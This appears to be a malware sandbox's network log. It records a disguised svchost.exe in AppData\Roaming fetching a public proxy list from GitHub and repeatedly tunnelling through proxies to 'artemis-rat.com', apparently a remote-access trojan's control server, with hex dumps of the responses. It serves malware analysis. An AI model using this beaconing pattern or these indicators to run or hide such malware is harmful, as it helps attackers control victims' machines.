                                                                                    2024-03-09 12:14:36 UTC1370INData Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                    Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                    2024-03-09 12:14:36 UTC1370INData Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69
                                                                                    Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
                                                                                    2024-03-09 12:14:36 UTC1370INData Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72
                                                                                    Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
                                                                                    2024-03-09 12:14:36 UTC1370INData Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 33 38 66 62 37 63 34 37 65 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f
                                                                                    Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-338fb7c47e7c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
                                                                                    2024-03-09 12:14:36 UTC1370INData Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78
                                                                                    Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
                                                                                    2024-03-09 12:14:36 UTC1370INData Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f
                                                                                    Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.563279172.67.140.8744356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:44 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:44 UTC161INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:44 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    2024-03-09 12:14:44 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.563403140.82.113.344343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:46 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                                                                                    Host: github.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-03-09 12:14:46 UTC506INHTTP/1.1 200 OK
                                                                                    Server: GitHub.com
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                    ETag: W/"736507163a5fb79617a9c43dc0d243c4"
                                                                                    Cache-Control: max-age=0, private, must-revalidate
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                    X-Frame-Options: deny
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                    2024-03-09 12:14:46 UTC3604INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                    2024-03-09 12:14:46 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                    Data Ascii: connection: close
                                                                                    2024-03-09 12:14:46 UTC1370INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                    Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                    2024-03-09 12:14:46 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                    Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                    2024-03-09 12:14:46 UTC1370INData Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                    Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                    2024-03-09 12:14:46 UTC1370INData Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69
                                                                                    Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
                                                                                    2024-03-09 12:14:46 UTC1370INData Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72
                                                                                    Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
                                                                                    2024-03-09 12:14:46 UTC1370INData Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 33 38 66 62 37 63 34 37 65 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f
                                                                                    Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-338fb7c47e7c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
                                                                                    2024-03-09 12:14:46 UTC1370INData Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78
                                                                                    Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
                                                                                    2024-03-09 12:14:46 UTC1370INData Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f
                                                                                    Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.549207222.255.238.15944356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:51 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:51 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:51 GMT
                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    2024-03-09 12:14:51 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.549301102.223.20.21744356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:51 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:52 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:52 GMT
                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    2024-03-09 12:14:52 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
